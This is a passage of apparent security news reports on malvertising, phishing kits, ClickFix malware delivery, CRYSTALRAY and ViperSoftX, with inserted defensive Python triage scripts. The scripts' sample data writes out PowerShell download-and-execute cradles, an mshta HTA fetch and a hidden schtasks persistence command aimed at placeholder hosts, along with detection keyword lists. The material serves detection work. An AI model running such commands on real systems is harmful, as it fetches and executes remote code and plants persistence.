The malicious ad campaign, which ran for several days, employed advanced filtering techniques to evade detection. Appearing as a top search result for Microsoft Teams, the ad displayed microsoft.com as its URL but actually redirected users through a series of deceptive links. The ad was likely paid for by a compromised Google ad account. Initially, the ad redirected straight to Microsoft's website, but after multiple attempts and tweaks, a full attack chain was finally observed.
[Image: Microsoft Teams for macOS Ad malware (Source: malwarebytes.com)]
Researchers from Malwarebytes stated that upon clicking the ad, users were subjected to a profiling process to ensure only actual people proceeded. This could help the malicious site evade detection from automated security tools and scans. A cloaking domain then separated the initial redirect from the malicious landing page, which mimicked the design of the official Microsoft Teams download site. The ad was found to be malicious, with a display URL showing Microsoft.com, but actually leading to a fake installation page. The advertiser, located in Hong Kong, runs over a thousand unrelated ads. Upon further investigation, it was discovered that the ad was using a unique payload for each visitor, generated from a domain called locallyhyped.com.
[Image: Microsoft Teams for macOS Ad malware 2 (Source: malwarebytes.com)]
Once the downloaded file was opened, the user was instructed to enter their password and grant access to the file system, allowing the malicious application to steal keychain passwords and important files. Following data theft, the data was exfiltrated via a single POST request to a remote attacker-controlled web server.

Mitigations for macOS Devices

To avoid falling victim to such attacks, researchers advised caution while downloading applications via search engines. Malvertising and SEO poisoning attacks can have devastating consequences, and it's crucial to use browser protection tools with the ability to block ads and malicious websites. Additionally, it's recommended to regularly update antivirus software and use a reputable ad blocker to minimize the risk of malware infection.
[Image: Microsoft Teams for macOS Ad Campaign (Source: Cyble)]
This campaign underscores the increasing sophistication of macOS malware due to the keen interest demonstrated by threat actors in compromising the operating system's environment. Last year, researchers from Cyble Research and Intelligence Labs (CRIL) observed that the Atomic Stealer used in this campaign had been offered via Telegram at the price of $1000 USD per month.

Operation BURGAZADA: Russian-Born Couple Charged with Espionage in Australia

By: Alan J
13 July 2024 at 07:29

Operation BURGAZADA- Russian Born Espionage in Australia

Australian authorities have charged a Russian-born couple with espionage in an operation referred to as 'Operation BURGAZADA', which marks the first use of new anti-espionage laws introduced in 2018. Kira Korolev, 40, a private in the Australian Army, and her husband Igor Korolev, 62, a laborer, face allegations of stealing sensitive Defense Force material for Russian intelligence. The couple, who arrived in Australia a decade ago and became citizens in recent years, appeared before a Brisbane magistrate on Friday. They could face up to 15 years in prison if convicted. The case has raised questions about the screening process for military recruits and the ongoing threat of foreign espionage.

Operation BURGAZADA Investigation

The AFP's investigation into the couple's activities is ongoing, with authorities seeking to determine whether the information was handed over to Russian authorities. Australian Security Intelligence Organisation (ASIO) director-general Mike Burgess has warned foreign spies that "when we can support a prosecution, we will support a prosecution."
[Image: Press conference in relation to the investigation (Source: spaces.hightail.com)]
Barrister Dylan Kerr, a commissioner from the Australian Federal Police, filed an application for the suppression of five names related to the case for national security reasons. The Defence Force has responded to these allegations by cancelling the couple's access to defence bases and systems. Court documents reveal that Kira Korolev is accused of providing unlawful access to defense computer systems, copying and disseminating information, and maintaining relationships with Russian Federation intelligence services. The alleged activities date back to December 2022 and continued until their arrest on July 11, 2024. Australian Federal Police Commissioner Reece Kershaw said Kira Korolev, an information systems technician with a security clearance, allegedly traveled to Russia in 2023 while on leave. During this time, she reportedly instructed her husband on accessing defense systems using her work account from their Brisbane home. A caretaker of the apartment block where the couple resided, Blake Fraser, stated that he had not noticed any suspicious activity from the couple.
He stated, “I kept my eye out for anything unusual, but honestly, even being here on-site, I never saw anything.” He said that he only received his first hint that something was off when the apartment had received a request from ASIO and the AFP to access its F block, later being greeted by police cars and officers who arrived to arrest the couple. “I certainly wouldn’t think that in my lifetime something like this would have happened,” Fraser exclaimed.

Official Response and Implications

The arrests resulted from a joint operation involving the Australian Security Intelligence Organisation (ASIO) and the Australian Federal Police. ASIO Director-General Mike Burgess stated that the Defense Force's security awareness allowed early intervention and control of the operation. Authorities are investigating whether Kira Korolev joined the Defense Force with the intention of committing espionage or if the couple had been recruited more recently into Russian intelligence. The case has prompted a review of vetting procedures for military personnel, especially those born overseas. While officials claim no significant security compromise has been identified, the incident highlights the ongoing challenges of countering foreign espionage. Mike Burgess, Director-General of the Australian Security Intelligence Organisation, encouraged potential Russian spies to defect and share secrets, using the famous example of the 1954 Petrov defections, where Soviet spies who posed as Russian diplomats had defected to Australia. Burgess stated, “If you want to share your secrets, please reach out.”
[Image: Vladimir Petrov and Evdokia Petrov, who defected to Australia in 1954 (Source: www.naa.gov.au)]
Federal Police Commissioner Kershaw stated that no other individuals had been identified so far in the investigation, while investigators are also working to assess whether the couple had established any rapport with Russian diplomats based in Australia. Court documents allege the couple maintained a relationship with members or affiliates of Russian intelligence services for the purpose of providing the information. Kershaw expressed confidence in the counter-intelligence capability of the Australian government and the Five Eyes. He stated:
“Our Five Eyes partners and the Australian government can be confident that the robust partnerships within the Counter Foreign Interference Taskforce mean we will continue to identify and disrupt espionage and foreign interference activity.”
Prime Minister Anthony Albanese emphasized that any individuals interfering with Australia's national interests will be held accountable.

New Phishing Kit β€˜FishXProxy’ Aims To Be β€˜Ultimate Powerful Phishing Kit’

By: Alan J
13 July 2024 at 06:42

Phishing Kit FishXProxy

Researchers have discovered a new weapon on the dark web markets: FishXProxy, a sophisticated phishing toolkit that's making waves in the underground hacking community. This powerful software package enables even novice attackers to create convincing phishing campaigns, potentially putting countless internet users at risk. FishXProxy bills itself as "The Ultimate Powerful Phishing Toolkit," and while its creators claim it's for educational purposes only, its features cater to malicious use. The kit provides an end-to-end solution for creating and managing phishing sites, focusing on evading detection and maximizing credential theft success rates.

FishXProxy Phishing Kit

At the heart of the new FishXProxy phishing kit is its multi-layered antibot system. These layers prevent automated scanners, security researchers, and potential victims from detecting the phishing nature of sites created with the kit.
[Image: Phishing Kit 'FishXProxy' (Source: slashnext.com)]
Options within the toolkit range from simple challenges and uniquely generated links to dynamic attachments and even the use of Cloudflare's CAPTCHA system as antibot implementations. Researchers from SlashNext state that the kit's deep integration with Cloudflare provides phishing operators with enterprise-grade infrastructure typically associated with legitimate web operations. This includes using Cloudflare Workers, SSL certificates, and DNS management, raising the bar for detection and takedown efforts.
[Image: New Phishing Kit 'FishXProxy' 2 (Source: slashnext.com)]
FishXProxy implements a cookie-based tracking system that allows attackers to identify and follow users across different phishing projects or campaigns. This enables more targeted and persistent attacks, as well as the ability to build detailed profiles of potential victims. These tools help attackers manage their campaigns more effectively while making it harder for security teams to analyze and shut down malicious infrastructure. The kit provides several end-to-end functionalities to maximize the potency of phishing campaigns; some of its key features include:
  • Advanced antibot system: This multi-layered system prevents automated scanners, security researchers, and potential victims from detecting the phishing nature of sites created with the kit. The antibot system offers several configuration options, including a Lite Challenge, Cloudflare Turnstile, IP/CAPTCHA Antibot, and Off option.
  • Cloudflare integration: FishXProxy leverages Cloudflare's infrastructure to provide phishing operators with enterprise-grade infrastructure typically associated with legitimate web operations. This includes Cloudflare Workers, Cloudflare Turnstile, SSL Certificates, and DNS Management.
  • Inbuilt redirector: This feature allows attackers to hide the true destination of links, distribute incoming traffic across multiple phishing pages or servers, and implement more complex traffic flows to evade detection.
  • Page expiration settings: This feature allows attackers to automatically restrict access to phishing content after a specified duration, limiting exposure, creating urgency, and aiding campaign management.
  • Cross-project user tracking: This feature allows attackers to identify and track users across different phishing projects or campaigns, enabling them to tailor phishing content based on previous interactions and avoid targeting the same user multiple times.

Impact of Phishing Kits on Cyber Ecosystem

The rise of FishXProxy and other phishing toolkits has significant implications for cybersecurity. These toolkits lower the technical barriers to conducting phishing campaigns, making it easier for less skilled individuals to conduct advanced phishing operations. This has the potential to increase the volume and sophistication of phishing attacks in the wild. These toolkits typically offer the following functionalities as implementations, that would be harder to develop from scratch:
  • Automated installation and setup
  • Built-in traffic encryption
  • Free and automated SSL certificate provisioning
  • Unlimited subdomain and random domain generation
  • Browser security bypass techniques
  • Real-time monitoring and notifications via Telegram
  • Comprehensive traffic analysis tools
The FishXProxy additionally offers 'lifetime updates + support,' treating the sale of the toolkit as a long-term service provision rather than a one-off attack or single sale bid. To combat these threats, companies should invest in advanced, multi-layered security solutions that offer real-time threat detection across email, web, and mobile channels. Organizations should also prioritize employee education on the latest phishing tactics and implement strong authentication measures to protect against credential theft attempts.

ClickFix Malware Delivery Method Used in Social Engineering Campaigns

By: Alan J
12 July 2024 at 11:41

Clickfix Malware Delivery Lumma Stealer and DarkGate

Researchers have uncovered a malware delivery method dubbed "ClickFix," which exploits user trust through compromised websites to deliver the DarkGate and Lumma Stealer malware variants. The ClickFix technique uses social engineering to trick users into executing malicious scripts, potentially leading to severe compromise of affected systems. These sites redirect visitors to domains hosting fake popup windows, which instruct users to paste a script into a PowerShell terminal.

ClickFix Social Engineering Infection Chain

After visitors are redirected from seemingly legitimate sites, instructions are displayed to deceive them into pasting various base64-encoded commands into a PowerShell terminal. Researchers from McAfee Labs stated that these commands are designed to download and execute malware from remote attacker-controlled C2 servers.
[Image: ClickFix malware delivery, DarkGate and Lumma Stealer prevalence over the past three months (Source: mcafee.com)]
The ClickFix social engineering technique showcases a highly effective and technical method for malware deployment. Once the malware is active on the system, it typically takes steps to evade security detection, such as clearing clipboard contents and running processes in minimized windows, maintains persistence on the victim's system, and steals users' personal data to send to a command and control (C2) server. The researchers have detailed the use of the ClickFix technique by the DarkGate and Lumma Stealer malware:
  • DarkGate: DarkGate is a malware family that relies on the ClickFix technique. The DarkGate malware is distributed through phishing emails that contain HTML attachments masquerading as MS Office Word document files. After a user opens the attachment, the HTML file displays a "How to fix" button that, upon clicking, displays base64-encoded commands which hide malicious PowerShell instructions. (Image: DarkGate ClickFix, source: mcafee.com) Upon running, the PowerShell commands download and execute an additional HTA file that contains further malicious payloads. Once infected, the malware is capable of exfiltrating sensitive information and providing unauthorized remote access to threat actors.
  • Lumma Stealer: While Lumma Stealer is distributed through similar use of the ClickFix technique, visitors are usually greeted directly with a webpage displaying an error message, such as a supposed browser problem, and are provided instructions to 'fix' the issue. (Image: Lumma Stealer ClickFix, source: mcafee.com) These instructions trick users into similarly entering base64-encoded commands into a PowerShell terminal that run the Lumma Stealer malware upon execution. This allows the stealer to bypass traditional security measures while compromising affected systems.
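As an added example (not McAfee's code), the following Python triage script for defenders pulls the base64 blob out of a PowerShell command line, decodes it, and scores the result against the steps described above: the download-and-execute cradle, the HTA stage, the clipboard clearing and the hidden window. The indicator list, the weights and the sample command lines (with placeholder hostnames in the reserved .invalid domain) are constructed for this example.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Indicator patterns with constructed weights. Each one maps to a step the
# report describes: the download-and-execute cradle, the HTA stage, clipboard
# clearing, and hidden windows.
INDICATORS = {
    r"(?i)\biex\b|invoke-expression": ("in-memory execution", 3),
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b": ("remote download", 3),
    r"(?i)\bmshta\b|\.hta\b": ("HTA stage", 3),
    r"(?i)set-clipboard|clear-clipboard": ("clipboard clearing", 2),
    r"(?i)-w(?:indowstyle)?\s+(?:hidden|minimized)": ("hidden or minimized window", 1),
    r"(?i)-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass": ("profile/policy bypass", 1),
}

# Two places a base64 payload hides on a command line: the -EncodedCommand
# argument (UTF-16LE text) and an inline FromBase64String('...') call.
ENC_ARG = re.compile(r"(?i)-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/]{16,}={0,2})")
INLINE_B64 = re.compile(r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]\s*\)")


@dataclass
class Finding:
    cmdline: str
    decoded: Optional[str] = None
    indicators: List[str] = field(default_factory=list)
    score: int = 0
    verdict: str = "clean"  # clean | review | alert


def decode_payload(blob: str) -> Optional[str]:
    """Base64-decode a blob; interleaved NULs mark UTF-16LE -EncodedCommand text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    encoding = "utf-16-le" if b"\x00" in raw[:64] else "utf-8"
    try:
        return raw.decode(encoding)
    except UnicodeDecodeError:
        return None


def scan(cmdline: str) -> Finding:
    finding = Finding(cmdline)
    match = ENC_ARG.search(cmdline) or INLINE_B64.search(cmdline)
    if match:
        finding.decoded = decode_payload(match.group(1))
        if finding.decoded is None:
            finding.indicators.append("undecodable base64 argument")
            finding.score += 1
    # Score the visible command line and the decoded payload together: the
    # ClickFix lure keeps the cradle inside the blob, not on the command line.
    text = cmdline + "\n" + (finding.decoded or "")
    for pattern, (label, weight) in INDICATORS.items():
        if re.search(pattern, text):
            finding.indicators.append(label)
            finding.score += weight
    if finding.score >= 6:
        finding.verdict = "alert"
    elif finding.score >= 3:
        finding.verdict = "review"
    return finding


def encode_for_powershell(script: str) -> str:
    """UTF-16LE base64, the form -EncodedCommand expects; used here only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation command lines; hostnames are placeholders.
SAMPLE_COMMAND_LINES = [
    # 0: routine administration
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    # 1: ClickFix-style paste: hidden window, encoded cradle, clipboard wiped afterwards
    "powershell.exe -w hidden -enc " + encode_for_powershell(
        "IEX (iwr 'http://stage.example.invalid/p').Content; Set-Clipboard -Value ''"),
    # 2: encoded but harmless, to show that base64 alone is not the signal
    "powershell.exe -EncodedCommand " + encode_for_powershell("Get-Date -Format o"),
    # 3: inline UTF-8 blob wrapping an HTA stage, as in the DarkGate chain
    'powershell.exe -ep bypass -c "IEX ([Text.Encoding]::UTF8.GetString('
    "[Convert]::FromBase64String('"
    + base64.b64encode(b"mshta http://stage.example.invalid/fix.hta").decode("ascii")
    + "')))\"",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        f = scan(line)
        print(f"[{f.verdict:6}] score={f.score} indicators={f.indicators}")
        if f.decoded:
            print(f"         decoded: {f.decoded}")
```

In production the same scoring would run over Sysmon process-creation events or PowerShell script block logs, where the decoded text is already available.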

Mitigations and Remediations

To protect against the ClickFix technique and malware such as DarkGate and Lumma stealer, the researchers have shared the following recommendations:
  • Regular training to inform potential victims about social engineering tactics or phishing campaigns.
  • Use of antivirus software on system endpoints.
  • Implementation of a robust email or website filtering system to block suspicious phishing mails, malicious attachments or malicious websites.
  • Deployment of firewalls and intrusion detection/prevention systems (IDS/IPS) to block malicious traffic on networks.
  • Network segmentation to prevent the spread of malware within organizations.
  • Monitoring of network logs and traffic.
  • Enforcement of the principle of least privilege (PoLP).
  • Implementation of security policies or monitoring over clipboard content, particularly in sensitive environments.
  • Implementation of multi-factor authentication (MFA).
  • Update operating systems, software, and applications to the latest available patched versions.
  • Encrypt stored data and data in transit to protect it from unauthorized access.
  • Regular and secure backups of important data.
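As an added example (not code from the McAfee researchers or the article), this Python check models the clipboard and PowerShell monitoring recommended above: it pulls base64 blobs out of process-creation command lines, decodes them the way PowerShell does (UTF-16LE for -EncodedCommand, UTF-8 for FromBase64String) and flags ClickFix-style download-and-run tokens. The log lines and the example.invalid URLs are constructed, not real telemetry.

```python
import base64
import re
from dataclasses import dataclass

# The two ways a ClickFix paste reaches PowerShell: the -EncodedCommand family of
# switches (payload is UTF-16LE) and an inline FromBase64String('...') call.
ENC_SWITCH_RE = re.compile(
    r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
FROM_B64_RE = re.compile(
    r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")

# Tokens typical of ClickFix stagers: fetch something, run it, hide the window, pull an HTA.
SUSPICIOUS_TOKENS = (
    "mshta", "invoke-webrequest", "iwr ", "downloadstring", "invoke-expression",
    "iex", ".hta", "-w hidden", "-windowstyle hidden", "executionpolicy bypass",
)


@dataclass
class Finding:
    line: str
    decoded: str
    hits: list


def _decode(blob: str) -> str:
    """Decode a base64 blob as PowerShell would: UTF-16LE when the bytes show the
    NUL-interleaving of ASCII-in-UTF-16, otherwise UTF-8."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def analyze_command_line(cmdline: str):
    """Return a Finding when a PowerShell command line carries an encoded payload
    containing ClickFix-style download/execute tokens, else None."""
    low_cmd = cmdline.lower()
    if "powershell" not in low_cmd and "pwsh" not in low_cmd:
        return None
    for blob in ENC_SWITCH_RE.findall(cmdline) + FROM_B64_RE.findall(cmdline):
        try:
            decoded = _decode(blob)
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 after all; skip it
        low = decoded.lower()
        hits = [t for t in SUSPICIOUS_TOKENS if t in low]
        if hits:
            return Finding(line=cmdline, decoded=decoded, hits=hits)
    return None


def analyze_logs(lines):
    """Run the check over 4688/Sysmon-style CommandLine fields; returns the Findings."""
    return [f for f in (analyze_command_line(line) for line in lines) if f]


# Constructed sample command lines (NOT real captures). The payloads mirror the
# article's description: a hidden PowerShell window that fetches and runs an HTA.
_STAGE1 = base64.b64encode(
    "mshta http://example.invalid/fix.hta".encode("utf-16le")).decode()
_STAGE2 = base64.b64encode(
    b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')").decode()

SAMPLE_LOGS = [
    'C:\\Windows\\System32\\cmd.exe /c dir',
    'powershell.exe -NoProfile -Command Get-Process',
    f'powershell.exe -w hidden -enc {_STAGE1}',
    f"powershell.exe -c \"IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{_STAGE2}')))\"",
]

if __name__ == "__main__":
    for finding in analyze_logs(SAMPLE_LOGS):
        print(f"ALERT {finding.hits}: {finding.decoded}")
```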

Ukrainian Cybercrime Kingpin 'Tank' Sentenced to Two Concurrent 9-Year Prison Terms

By: Alan J
12 July 2024 at 08:51

Tank Sentenced

Vyacheslav Igorevich Penchukov, a Ukrainian hacker known as "Tank," has been sentenced to two concurrent 9-year prison terms by a U.S. federal court in Lincoln, Nebraska, for his role in a prolific cybercrime gang that stole tens of millions of dollars from small businesses. The 38-year-old pleaded guilty to two charges: conspiracy to participate in racketeering and conspiracy to commit wire fraud. Judge John M. Gerrard also ordered him to pay more than $73 million in restitution and forfeited funds for these crimes.

'Tank' and JabberZeus Crew

Penchukov admitted to leading the Jabber Zeus hacking group, which used sophisticated malware to steal bank account information from small U.S. and European businesses. The group's operations, which began in 2009, resulted in tens of millions of dollars in losses. The FBI had been pursuing Penchukov for over a decade, and his capture in Switzerland in 2022 brought an end to his criminal spree. While leading the Jabber Zeus hacking crew, 'Tank' used the Zeus malware to infect computers and steal bank account information. He also organized the IcedID malware operation, which collected financial details and allowed ransomware to be deployed on systems. Investigators found a spreadsheet detailing the $19.9 million in income IcedID made in 2021. The University of Vermont Medical Center was among the prominent victims of the IcedID malware, losing over $30 million in the attack, which rendered many of the institution's critical patient services unavailable for more than two weeks. Penchukov had been charged in connection with the attack by law enforcement in the Eastern District of North Carolina. In response to the incident, U.S. Attorney Michael Easley for the Eastern District of North Carolina stated, "Malware like IcedID bleeds billions from the American economy and puts our critical infrastructure and national security at risk." Last September, Dr. Stephen Leffler, President of the University of Vermont Medical Center, testified to the House of Representatives that the center was unable to access its own medical records for 28 days due to the incident. Dr. Leffler stated, "We didn't have internet." He added, "We didn't have phones. It impacted radiology imaging, laboratory results." According to Dr. Leffler's testimony, the medical center's staff had rushed to purchase walkie-talkies to keep services running. Penchukov appeared on the FBI's most wanted cyber list for over a decade as the recognized leader of the cybercrime gang.
Earlier, prosecutors had stated in court, "The defendant played a crucial role, a leadership role, in this scheme by directing and coordinating the exchange of stolen banking credentials and money mules." Jim Craig, a former FBI special agent who led the 2009 investigation into the Zeus cybercriminal group, expressed satisfaction with the outcome. Craig stated, "I never thought that we would ever see any of Jabber Zeus crew face justice in the U.S." Besides his involvement in cybercrime, Penchukov had also been identified as a popular DJ who operated within Ukraine under the moniker 'DJ Slava Rich.'

Implications of Ruling

The prosecution of Penchukov represents a significant milestone in the fight against high-value cybercrime targets and shows the persistence of law enforcement in the face of international jurisdictional challenges. Western law enforcement authorities are known to face challenges in prosecuting Eastern European cybercriminals, particularly those operating out of Russia or Ukraine, which do not have official extradition agreements with the US government. Craig pointed out, "The significance of him being caught is important to show that law enforcement is not going to stop, wherever they go, there's going to be a chance and opportunity for them to get caught." The case also raises questions about potential cooperation between Penchukov and authorities to aid ongoing cybercrime investigations: according to court documents, both Penchukov's own lawyer and the US government requested less severe sentences after he had pleaded guilty to the two charges of conspiring to participate in racketeering and conspiring to commit wire fraud. Several charges against Penchukov were dropped following his signing of a plea agreement, the details of which are not public.

CRYSTALRAY Group Scaled Attacks To Target Over 1500 Victims Worldwide

By: Alan J
12 July 2024 at 06:48

CRYSTALRAY Group hackers

A threat actor group dubbed 'CRYSTALRAY' has dramatically scaled up its attack operations, targeting over 1,500 victims worldwide with a sophisticated arsenal of open-source security tools. Researchers first observed the group's activities in February 2024 and have been tracking its evolving tactics since. The group's primary goals appear to be credential theft, cryptomining and maintaining persistent long-term access to compromised systems. The group's tactics reflect a concerning trend of threat actor groups weaponizing legitimate open-source security tools for malicious intent and illicit financial gain.

CRYSTALRAY Reconnaissance and Initial Access

Researchers from Sysdig observed that the group had significantly scaled up its operations to target over 1,500 victims, abusing a wide range of legitimate open-source security tools to exploit known vulnerabilities and deploy backdoors. CRYSTALRAY's attack chain begins with careful reconnaissance of potential victims; the group uses tools from ProjectDiscovery, an open-source organization, to identify targets. CRYSTALRAY's arsenal includes zmap, asn, httpx, nuclei, platypus, and SSH-Snake. To gain initial access, the group often modifies existing proof-of-concept exploits for known vulnerabilities, testing them before deployment against real-world targets. These operations tend to focus on specific countries, with the United States and China accounting for over half of the observed victims. (Figure: Chart of targeted countries. Source: sysdig.com) The attackers employ a tool called "ASN" to generate lists of IP addresses for the targeted countries. They then use "zmap," a network scanner, to probe these IPs for exploitable vulnerabilities in commonly used platforms such as Confluence, WebLogic and ActiveMQ. The httpx module is used to verify the presence of vulnerable running services, with an httpx_output.txt file generated to filter out invalid results. Nuclei is then used to perform vulnerability scans, identifying CVEs such as CVE-2022-44877 (an arbitrary command execution flaw), CVE-2021-3129 (another arbitrary code execution flaw), and CVE-2019-18394 (a server-side request forgery flaw).

Lateral Movement, Data Theft and Crypto-Mining

After breaching a system, CRYSTALRAY focuses on lateral movement and data collection. A key tool in its arsenal is SSH-Snake, an open-source worm that spreads through networks using stolen SSH credentials. (Figure: CRYSTALRAY lateral movement. Source: sysdig.com) The group moves beyond server access and compromise to search for credentials, such as passwords or API keys of popular cloud providers, stored as environment variables in files such as .env configurations, potentially allowing it to expand its reach into victims' cloud infrastructure. The group automates the SSH-Snake tool to extract and exfiltrate credential data back to attacker-owned command-and-control servers. Ultimately, the group deploys cryptominers on breached systems to hijack the hosts' processing power, with a script killing any existing cryptominers to maximize profit. The researchers traced the deployed mining workers to a specific pool and found they were earning roughly $200/month; starting in April, however, the group switched to a new configuration, making it impossible for the researchers to determine its current revenue. Researchers have offered the following recommendations to protect against these attacks:
  • Reduce the potential cloud attack surface through secure vulnerability, identity, and secrets management to prevent automated attacks.
  • Organizations that must expose applications to the public Internet face additional risk and should therefore prioritize vulnerability remediation to reduce their exposure.
  • Runtime detections that enable organizations to detect successful attacks and take immediate remediation action, allowing for in-depth forensic analysis to determine the root cause of attacks.
The scale and sophistication of CRYSTALRAY's operations highlight the growing threat posed by cybercriminals leveraging open-source security tools.
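As an added example (not Sysdig's or CRYSTALRAY's tooling), this Python audit implements the secrets-management point above from the defender's side: it walks a directory tree for .env files, flags cloud-credential variables of the kind the article says are harvested, and reports whether the file is readable by every local user. The sample tree, variable names and AKIA-prefixed value are constructed.

```python
import os
import re
import stat
import tempfile
from dataclasses import dataclass

# Variable names and value shapes that point to a credential living in a plaintext
# .env file, the kind of loot the article says SSH-Snake is automated to harvest.
SENSITIVE_KEY_RE = re.compile(
    r"(SECRET|PASSWORD|PASSWD|TOKEN|API_KEY|PRIVATE_KEY|ACCESS_KEY)", re.I)
AWS_ACCESS_KEY_ID_RE = re.compile(r"^(AKIA|ASIA)[0-9A-Z]{16}$")


@dataclass
class Finding:
    path: str
    key: str
    reason: str
    world_readable: bool


def parse_env(text: str) -> dict:
    """Minimal KEY=VALUE parser for .env files (comments, blanks and quotes handled)."""
    values = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        values[key.strip()] = value.strip().strip("'\"")
    return values


def audit_env_file(path: str) -> list:
    """Flag credential-looking entries in one .env file and note whether others can read it."""
    world_readable = bool(os.stat(path).st_mode & stat.S_IROTH)
    with open(path, encoding="utf-8", errors="replace") as fh:
        entries = parse_env(fh.read())
    findings = []
    for key, value in entries.items():
        if not value:
            continue
        if AWS_ACCESS_KEY_ID_RE.match(value):
            findings.append(Finding(path, key, "AWS access key id", world_readable))
        elif SENSITIVE_KEY_RE.search(key):
            findings.append(Finding(path, key, "secret-like variable name", world_readable))
    return findings


def scan_tree(root: str) -> list:
    """Walk a directory tree and audit every .env / .env.* file found."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name == ".env" or name.startswith(".env."):
                findings.extend(audit_env_file(os.path.join(dirpath, name)))
    return sorted(findings, key=lambda f: (f.path, f.key))


def demo() -> list:
    """Build a constructed sample tree (no real data) and return the audit result."""
    root = tempfile.mkdtemp(prefix="envaudit-")
    app = os.path.join(root, "app")
    os.makedirs(app)
    exposed = os.path.join(app, ".env")
    with open(exposed, "w") as fh:
        fh.write("# constructed sample values, not real credentials\n"
                 "PORT=8080\n"
                 "AWS_ACCESS_KEY_ID=AKIAEXAMPLE000000001\n"
                 "AWS_SECRET_ACCESS_KEY='not-a-real-secret'\n"
                 "DB_PASSWORD=hunter2\n")
    os.chmod(exposed, 0o644)   # readable by every local user: what a worm on the host wants
    clean = os.path.join(root, ".env.local")
    with open(clean, "w") as fh:
        fh.write("DEBUG=true\nLOG_LEVEL=info\n")
    os.chmod(clean, 0o600)
    return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: {f.key} ({f.reason}) world-readable={f.world_readable}")
```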

Researchers Observe Improvements in ViperSoftX Info-Stealing Malware Distributed Through eBooks

By: Alan J
10 July 2024 at 21:09

ViperSoftX Info-Stealing Malware

Researchers have observed improvements in the ViperSoftX info-stealing malware that had been first spotted in 2020. The malware has moved toward employing more sophisticated evasion tactics, refined through the incorporation of the Common Language Runtime (CLR) to run PowerShell commands within AutoIt scripts distributed through pirated eBook copies. This clever trick allows the malware to blend in with legitimate system activities, making it harder for security solutions to spot.

ViperSoftX Distributed as Trojan Horse in eBooks

(Figure: The mechanics of ViperSoftX. Source: www.trellix.com) ViperSoftX spreads through torrent sites, masquerading as eBooks. The infection chain begins when the user opens the downloaded RAR archive, which includes a hidden folder, a deceptive shortcut file that appears to be a harmless PDF or eBook, a PowerShell script, AutoIt.exe, and an AutoIt script, which pose as simple JPG image files. (Figure: ViperSoftX archive contents. Source: www.trellix.com) When the user clicks the shortcut file, it initiates a command sequence that begins by listing the contents of "zz1Cover4.jpg". It then reads each line of this file, in which commands are cleverly hidden within blank spaces, into a PowerShell command prompt, effectively automating the execution of multiple commands. The researchers from Trellix state that the PowerShell code performs several actions, including unhiding the hidden folder, calculating the total size of all disk drives, and configuring Windows Task Scheduler to run AutoIt3.exe every five minutes after the user logs in, effectively setting up a persistence mechanism on infected systems. The malware also copies two files to the %APPDATA%\Microsoft\Windows directory, renaming one of them to .au3 and the other to AutoIt3.exe.
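As an added example, not Trellix's code or a sample from the campaign, this Python triage helper checks a file carrying an image name for the traits described above: missing image magic bytes, lines whose content is hidden behind long whitespace runs, and script keywords. The decoy bytes are constructed.

```python
import re

# Magic bytes genuine images start with; a script saved under a .jpg name will lack them.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF8")
# A line whose visible content sits after a long run of spaces or tabs, the trick the
# article describes for hiding commands inside "zz1Cover4.jpg".
HIDDEN_LINE_RE = re.compile(rb"^[ \t]{20,}(\S.*)$", re.M)
SCRIPT_HINTS = (b"powershell", b"schtasks", b"autoit", b"-enc", b"iex", b"invoke-", b"attrib ")


def triage_decoy(name: str, data: bytes) -> dict:
    """Report why a file that claims to be an image looks like a script carrier."""
    findings = []
    looks_like_image = name.lower().endswith((".jpg", ".jpeg", ".png", ".gif"))
    if looks_like_image and not data.startswith(IMAGE_MAGIC):
        findings.append("image extension but no image magic bytes")
    hidden = [m.group(1).strip().decode("latin-1") for m in HIDDEN_LINE_RE.finditer(data)]
    if hidden:
        findings.append(f"{len(hidden)} line(s) with content hidden behind long whitespace runs")
    low = data.lower()
    hints = sorted(h.decode() for h in SCRIPT_HINTS if h in low)
    if hints:
        findings.append("script keywords: " + ", ".join(hints))
    return {"file": name, "suspicious": bool(findings),
            "findings": findings, "hidden_lines": hidden}


# Constructed samples (not files from the actual campaign): a text file posing as a
# cover image with commands pushed off-screen by leading spaces, and a real JPEG header.
DECOY_JPG = (b"cover art placeholder text\n"
             + b" " * 40 + b"attrib -h -s . /d\n"
             + b" " * 40 + b"powershell -w hidden -enc QQBCAEMA\n"
             + b" " * 40 + b"schtasks /create /sc minute /mo 5 /tn Updater /tr AutoIt3.exe\n")
REAL_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + bytes(64)

if __name__ == "__main__":
    for fname, blob in (("zz1Cover4.jpg", DECOY_JPG), ("cover.jpg", REAL_JPG)):
        print(triage_decoy(fname, blob))
```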

Increasing ViperSoftX Sophistication

